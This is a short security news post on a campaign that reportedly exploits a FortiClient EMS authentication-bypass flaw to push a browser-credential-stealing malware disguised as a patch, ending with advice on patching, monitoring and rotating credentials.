Cybersecurity researchers have come across this campaign where threat actors use a really critical FortiClient Endpoint Management Server (EMS) vulnerability, kinda to push credential-stealing malware onto endpoints that are already managed.
They say the whole thing hinges on CVE-2026-35616, which is high-severity and lets an attacker bypass API authentication, then end up with elevated privileges inside FortiClient EMS environments that were not properly updated. Fortinet already put out patches for it, but researchers reported seeing real-time exploitation in the wild against systems that stayed unpatched.
From what they observed, the attackers basically used the compromised EMS infrastructure itself to issue malicious commands to the endpoint devices. Since they’re abusing the trusted management pathways, the behavior looks pretty much like normal admin work, so defenders might miss it, or at least have a harder time proving what’s going on.
Once access was achieved, the attackers reportedly changed endpoint policies and management settings so malicious PowerShell scripts would run across connected devices. And because EMS is central, managing tons of machines at once, one EMS compromise could turn into a blast radius over an entire organization.
The chain they described involved a legitimate FortiClient component that starts scripts that then pull down a malicious executable, but it’s masked like a software update. This fake file is called "FortiEndpoint_Patch.exe", and it’s not a real patch at all, but rather a kind of information-grabbing malware meant to collect sensitive browser data.
Investigators found that the malware can steal passwords, cookies, saved login sessions, autofill entries, addresses, phone numbers, and even stored payment card information from Chromium-based and Gecko-based browsers. After that, the gathered data was packaged up for sending back to the attacker-controlled infrastructure.
One of the most concerning parts of the campaign is the possibility of session hijacking, like someone else just picking up where you left off. With stolen browser cookies and already authenticated sessions, an attacker could get into cloud services, business applications, and internal systems. And they may not even have to keep repeatedly dodging multi-factor authentication, which is, frankly, the point that makes this so worrying.
This incident shows how threat actors are leaning more and more toward management platforms and other trusted enterprise tools, because it lets them maximize impact. Rather than compromising devices one by one, attackers can abuse centralized infrastructure, then push malware everywhere in a kind of coordinated, quick way.
If you’re using FortiClient EMS, you’re strongly advised to apply the latest security updates. Also, take a moment to review endpoint management policies, monitor PowerShell activity, and look into any strange configuration changes. In addition, security teams should think about rotating credentials and invalidating active sessions if compromise is even suspected, even slightly.
Cybersecurity-minded organizations, like IntelligenceX, keep stressing patch management, privileged access security, and continuous monitoring. They point out that attackers are increasingly abusing trusted enterprise management systems to distribute malware and pilfer credentials, not just to cause random disruption.
Top comments (0)